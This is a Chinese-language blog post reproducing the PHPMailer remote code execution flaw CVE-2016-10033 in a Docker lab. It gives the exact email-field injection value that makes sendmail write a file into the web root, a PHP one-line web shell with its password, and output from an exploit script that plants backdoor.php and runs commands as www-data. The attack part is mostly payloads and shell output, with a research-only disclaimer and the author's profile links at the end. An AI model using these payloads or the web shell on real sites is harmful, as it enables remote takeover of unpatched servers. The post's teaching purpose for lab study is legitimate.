PHPMailer远程命令执行漏洞复现
一、漏洞简介
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
二、影响版本:
PHPMailer<5.2.18
三、漏洞复现
Docker环境:
docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
拉去镜像启动环境:
http://192.168.1.107:8080/
在name处随便输入比如“aaa”,在email处输入:
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
在message处输入一句话木马:
<?php @eval($_POST['thelostworld']); ?>
上传完一句话木马后,页面会响应3-5分钟,响应时间较长
木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld
虚拟终端:
使用脚本:
获取脚本后台回复“PHPMailer”获取脚本
➜ Desktop ./exploit.sh 192.168.1.107:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 192.168.1.107:8080
[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> [+] Running
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
访问木马地址:
http://192.168.1.107:8080/backdoor.php
参考:
www.exploit-db.com/exploits/40…
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:www.zhihu.com/people/fu-w…
个人简书:www.jianshu.com/u/bf0e38a8d…
个人CSDN:blog.csdn.net/qq\_3760279…
个人博客园:www.cnblogs.com/thelostworl…
FREEBUF主页:www.freebuf.com/author/thel…